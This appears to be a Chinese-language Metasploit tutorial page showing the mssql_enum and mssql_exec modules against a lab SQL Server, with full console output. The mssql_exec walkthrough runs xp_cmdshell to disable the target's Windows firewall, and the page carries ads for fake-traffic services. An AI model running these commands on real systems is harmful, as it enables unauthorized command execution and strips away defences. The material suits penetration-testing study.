Metasploit 辅助模块:Admin MSSQL

mssql_enum

该“mssql_enum”是一个管理模块,将接受一组凭据和查询各种配置设置的MSSQL。

msf > use auxiliary/admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > show options

Module options (auxiliary/admin/mssql/mssql_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOST                                 yes       The target address
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

 

要配置模块,我们接受默认的用户名,设置我们的PASSWORD和RHOST,然后让它运行。

msf auxiliary(mssql_enum) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_enum) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_enum) > run

[*] Running MS SQL Server Enumeration...
[*] Version:
[*]	Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
[*]		Oct 14 2005 00:33:37 
[*]		Copyright (c) 1988-2005 Microsoft Corporation
[*]		Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
[*] Configuration Parameters:
[*] 	C2 Audit Mode is Not Enabled
[*] 	xp_cmdshell is Not Enabled
[*] 	remote access is Enabled
[*] 	allow updates is Not Enabled
[*] 	Database Mail XPs is Not Enabled
[*] 	Ole Automation Procedures are Not Enabled
[*] Databases on the server:
[*] 	Database name:master
[*] 	Database Files for master:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\master.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf
[*] 	Database name:tempdb
[*] 	Database Files for tempdb:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\tempdb.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\templog.ldf
[*] 	Database name:model
[*] 	Database Files for model:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\model.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\modellog.ldf
[*] 	Database name:msdb
[*] 	Database Files for msdb:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\MSDBData.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\MSDBLog.ldf
[*] System Logins on this Server:
[*] 	sa
[*] 	##MS_SQLResourceSigningCertificate##
[*] 	##MS_SQLReplicationSigningCertificate##
[*] 	##MS_SQLAuthenticatorCertificate##
[*] 	##MS_AgentSigningCertificate##
[*] 	BUILTIN\Administrators
[*] 	NT AUTHORITY\SYSTEM
[*] 	V-MAC-XP\SQLServer2005MSSQLUser$V-MAC-XP$SQLEXPRESS
[*] 	BUILTIN\Users
[*] Disabled Accounts:
[*] 	No Disabled Logins Found
[*] No Accounts Policy is set for:
[*] 	All System Accounts have the Windows Account Policy Applied to them.
[*] Password Expiration is not checked for:
[*] 	sa
[*] System Admin Logins on this Server:
[*] 	sa
[*] 	BUILTIN\Administrators
[*] 	NT AUTHORITY\SYSTEM
[*] 	V-MAC-XP\SQLServer2005MSSQLUser$V-MAC-XP$SQLEXPRESS
[*] Windows Logins on this Server:
[*] 	NT AUTHORITY\SYSTEM
[*] Windows Groups that can logins on this Server:
[*] 	BUILTIN\Administrators
[*] 	V-MAC-XP\SQLServer2005MSSQLUser$V-MAC-XP$SQLEXPRESS
[*] 	BUILTIN\Users
[*] Accounts with Username and Password being the same:
[*] 	No Account with its password being the same as its username was found.
[*] Accounts with empty password:
[*] 	No Accounts with empty passwords where found.
[*] Stored Procedures with Public Execute Permission found:
[*] 	sp_replsetsyncstatus
[*] 	sp_replcounters
[*] 	sp_replsendtoqueue
[*] 	sp_resyncexecutesql
[*] 	sp_prepexecrpc
[*] 	sp_repltrans
[*] 	sp_xml_preparedocument
[*] 	xp_qv
[*] 	xp_getnetname
[*] 	sp_releaseschemalock
[*] 	sp_refreshview
[*] 	sp_replcmds
[*] 	sp_unprepare
[*] 	sp_resyncprepare
[*] 	sp_createorphan
[*] 	xp_dirtree
[*] 	sp_replwritetovarbin
[*] 	sp_replsetoriginator
[*] 	sp_xml_removedocument
[*] 	sp_repldone
[*] 	sp_reset_connection
[*] 	xp_fileexist
[*] 	xp_fixeddrives
[*] 	sp_getschemalock
[*] 	sp_prepexec
[*] 	xp_revokelogin
[*] 	sp_resyncuniquetable
[*] 	sp_replflush
[*] 	sp_resyncexecute
[*] 	xp_grantlogin
[*] 	sp_droporphans
[*] 	xp_regread
[*] 	sp_getbindtoken
[*] 	sp_replincrementlsn
[*] Instances found on this server:
[*] 	SQLEXPRESS
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*] 	xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) >

 

mssql_exec

该“mssql_exec”管理员模块执行xp_cmdshell存储过程的优势,在远程系统上执行命令。如果您已经获取或猜到了MSSQL管理员凭据,这可能是一个非常有用的模块。

msf > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

   Name                 Current Setting                       Required  Description
   ----                 ---------------                       --------  -----------
   CMD                  cmd.exe /c echo OWNED > C:\owned.exe  no        Command to execute
   PASSWORD                                                   no        The password for the specified username
   RHOST                                                      yes       The target address
   RPORT                1433                                  yes       The target port (TCP)
   TDSENCRYPTION        false                                 yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa                                    no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false                                 yes       Use windows authentification (requires DOMAIN option set)

 

我们设置我们的RHOST和PASSWORD值,并将CMD设置为禁用远程系统上的Windows防火墙。这可以使我们有可能利用目标上运行的其他服务。

msf auxiliary(mssql_exec) > set CMD netsh firewall set opmode disable
CMD => netsh firewall set opmode disable
msf auxiliary(mssql_exec) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_exec) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_exec) > run

[*] The server may have xp_cmdshell disabled, trying to enable it...
[*] SQL Query: EXEC master..xp_cmdshell 'netsh firewall set opmode disable'



 output
 ------
 Ok.
 
 

[*] Auxiliary module execution completed
msf auxiliary(mssql_exec) >

 

Metasploit 教程

    A+
发布日期:2018年06月13日 20:29:28  所属分类:Metasploit
最后更新时间:2018-06-13 20:29:28
评分: (当前没有评级)
付杰
SEO顾问服务 中小型网站 单站/最低99.9元 全方位优化
SEO顾问服务 中小型网站 单站/最低99.9元 全方位优化
  • ¥ 99.9元
  • 市场价:5000元
PHP运行环境 wamp lamp lnmp 安装 配置 搭建服务
PHP运行环境 wamp lamp lnmp 安装 配置 搭建服务
  • ¥ 9.9元
  • 市场价:49.9元
刷流量、刷人气、刷点击、刷收藏、刷APP关键词服务
刷流量、刷人气、刷点击、刷收藏、刷APP关键词服务
  • ¥ 1.0元
  • 市场价:9.9元
wordpress站群服务 泛解析二级域名 二级目录站群
wordpress站群服务 泛解析二级域名 二级目录站群
  • ¥ 1999.9元
  • 市场价:4800元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: